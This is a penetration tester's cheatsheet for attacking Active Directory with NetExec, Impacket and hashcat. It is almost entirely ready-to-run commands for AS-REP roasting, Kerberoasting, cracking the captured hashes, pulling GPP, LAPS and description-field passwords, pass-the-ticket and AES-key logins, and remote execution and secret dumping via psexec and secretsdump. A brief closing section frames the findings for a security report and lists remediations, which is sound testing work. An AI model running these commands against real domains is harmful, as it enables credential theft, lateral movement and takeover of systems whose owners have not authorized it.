🛡️ Methodology Checklist
- Add DC FQDN to /etc/hosts (required for LDAP/Kerberos)
- LDAP enum:
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --users - ASREPRoast (authenticated):
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --asreproast hashes.txt - ASREPRoast (unauthenticated, needs list):
nxc ldap [DC_FQDN] -u users.txt -p '' --asreproast hashes.txt - Kerberoast:
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --kerberoasting kerb.txt - GPP password:
nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_password - LAPS:
nxc smb [TARGET] -u [USER] -p [PASS] -M laps - Crack Kerberoast:
hashcat -m 13100 kerb.txt [wordlist]
🎯 Operational Context
Use when: Domain creds available — enumerate AD via LDAP and test Kerberos authentication with nxc.
Think Dumber First: nxc ldap [DC] -u [USER] -p [PASS] -M get-desc-users and nxc ldap [DC] -u [USER] -p [PASS] --asreproast asrep.txt — description field often contains passwords and AS-REP roasting takes 5 seconds.
Skip when: No domain creds — null/anonymous LDAP bind required first.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --get-sid | Retrieve Domain SID |
nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M get-network -o ALL=true | Enumerate internal DNS records from AD Integrated DNS |
nxc ldap [DC_FQDN] -u [USER_FILE] -p '' --asreproast asrep_hashes.txt | ASREPRoast without creds (requires valid usernames) |
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --asreproast asrep_hashes.txt | ASREPRoast all eligible accounts (authenticated) |
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --kerberoasting kerb_hashes.txt | Kerberoast all SPN accounts → TGS hashes to file |
nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M user-desc -o ADD_KEYWORDS=ip,vpn,pass | Search AD user descriptions for credentials |
nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_password | Find credentials in Group Policy Preferences |
nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_autologin | Find autologon credentials in GPO Registry.xml |
nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M laps | Extract LAPS managed admin passwords |
hashcat -a 0 -m 18200 asrep_hashes.txt rockyou.txt | Crack ASREPRoast hashes |
hashcat -a 0 -m 13100 kerb_hashes.txt rockyou.txt | Crack Kerberoast TGS hashes |
impacket-getTGT [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] | Request a TGT from Linux → writes [USER].ccache |
export KRB5CCNAME=[TICKET_PATH] && nxc smb [TARGET_IP] --use-kcache | Authenticate using a .ccache Kerberos ticket |
nxc smb [TARGET_IP] -u [USER] --aesKey [AES_KEY] | Authenticate with captured AES-256 Kerberos key |
🔬 Deep Dive & Workflow
LDAP Enumeration (Requires Valid Domain Account)
# Basic LDAP connection test
nxc ldap [DC_FQDN] -u [USER] -p [PASS]
# → Must use FQDN (not IP) for LDAP/Kerberos — add to /etc/hosts
# Domain SID
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --get-sid
# → S-1-5-21-[DOMAIN-SID]
# Internal DNS enumeration — map internal network
nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M get-network -o ALL=true
# → Lists A records from AD-integrated DNS zone
# → Finds hosts not visible via subnet scanASREPRoasting with NetExec
# Unauthenticated (requires list of valid usernames)
nxc ldap [DC_FQDN] -u users.txt -p '' --asreproast asrep_out.txt
# → Tests each username; if "Do not require Kerberos preauthentication" → dumps TGT hash
# Authenticated (finds ALL eligible accounts automatically)
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --asreproast asrep_out.txt
# Crack offline
hashcat -a 0 -m 18200 asrep_out.txt /usr/share/wordlists/rockyou.txt
# → Hash format: $krb5asrep$23$...Kerberoasting with NetExec
# Find and dump all SPN accounts
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --kerberoasting kerb_out.txt
# → Requests TGS for each SPN account → offline crackable
# Crack offline
hashcat -a 0 -m 13100 kerb_out.txt /usr/share/wordlists/rockyou.txt --force
# → Hash format: $krb5tgs$23$*...*
# See also: AD_Kerberoasting.md for targeted methods and OPSECCredential Hunting via LDAP Modules
# User descriptions (admins sometimes store passwords here)
nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M user-desc
# → Default keywords: pass, password, temp, admin
# → Add custom keywords:
nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M user-desc -o ADD_KEYWORDS=ip,vpn,cred,secret
# GPP passwords (old Group Policy Preferences — pre-2014)
nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_password
# → Finds cpassword in SYSVOL → decrypts with known AES key (MS14-025)
# GPP autologin credentials
nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_autologin
# → Checks GPO Registry.xml files for stored AutoAdminLogon credentialsLAPS Password Extraction
# Extract LAPS managed local admin passwords
nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M laps
# → Requires: target computer's LAPS attribute readable by current user
# → Often readable by: computer's owner, specific delegated groups
# Output: Computer name → LAPS password (rotated local admin)
# → Use for lateral movement to that specific machineKerberos Ticket Authentication
# Use .ccache ticket (from pass-the-ticket / impacket)
export KRB5CCNAME=/tmp/admin.ccache
nxc smb [TARGET_IP] --use-kcache
# Add DC FQDN to /etc/hosts (REQUIRED for Kerberos)
echo "[DC_IP] [DC_FQDN]" >> /etc/hosts
# AES key authentication (from Mimikatz sekurlsa::ekeys)
nxc smb [TARGET_IP] -u [USER] --aesKey [256_BIT_AES_KEY]Linux: Request TGT and Use .ccache
# 0. Kerberos needs the DC FQDN to resolve and time within 5 min skew
echo "[DC_IP] [DC_FQDN] [DOMAIN]" >> /etc/hosts
sudo ntpdate [DC_IP] # or: sudo rdate -n [DC_IP]
# → Clock skew > 5 min → KRB_AP_ERR_SKEW
# 1. Request a TGT with Impacket → writes [USER].ccache to CWD
impacket-getTGT [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP]
# → With a hash: impacket-getTGT [DOMAIN]/[USER] -hashes :[NT_HASH] -dc-ip [DC_IP]
# → With AES key: impacket-getTGT [DOMAIN]/[USER] -aesKey [AES_KEY] -dc-ip [DC_IP]
# → Output: "Saving ticket in [USER].ccache"
# 2. Export the ticket so Kerberos-aware tools find it
export KRB5CCNAME=$(realpath [USER].ccache)
klist # → confirm TGT present + expiry (krbtgt principal)
# 3. Use the ticket — no password needed (-k / --use-kcache / -no-pass)
nxc smb [TARGET_FQDN] --use-kcache
impacket-psexec -k -no-pass [DOMAIN]/[USER]@[TARGET_FQDN]
impacket-secretsdump -k -no-pass [DOMAIN]/[USER]@[TARGET_FQDN]
# → Always target the FQDN, not the IP — Kerberos validates the SPN host🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| nxc ldap fails with port error | Default LDAP port issue | Specify: nxc ldap [DC] -u [USER] -p [PASS] --port 389 |
| LDAPS required | LDAP signing enforced | Add --use-ldaps flag; port 636 |
| ASREPRoast module returns nothing | No accounts without preauth | Check manually: impacket-GetNPUsers -usersfile users.txt -no-pass [DOMAIN]/ |
| get-desc-users returns empty | No descriptions set | Try: nxc ldap [DC] -u [USER] -p [PASS] -M ldap-checker for broader enumeration |
| Kerberos test fails | Clock skew | Sync time with DC before Kerberos operations |
📝 Reporting Trigger
Finding Title: LDAP Enumeration via NetExec Yields Sensitive AD Data Impact: LDAP queries with standard domain credentials expose user descriptions containing passwords, AS-REP roastable accounts, and sensitive AD configuration data, accelerating privilege escalation without additional exploitation. Root Cause: Sensitive information stored in AD user description fields visible to all authenticated users. LDAP read access not restricted based on data sensitivity. Recommendation: Audit and remove sensitive information from AD user description fields. Enable AD auditing for bulk LDAP reads. Implement LDAP query restrictions for sensitive attributes. Deploy Microsoft Defender for Identity to detect reconnaissance via LDAP.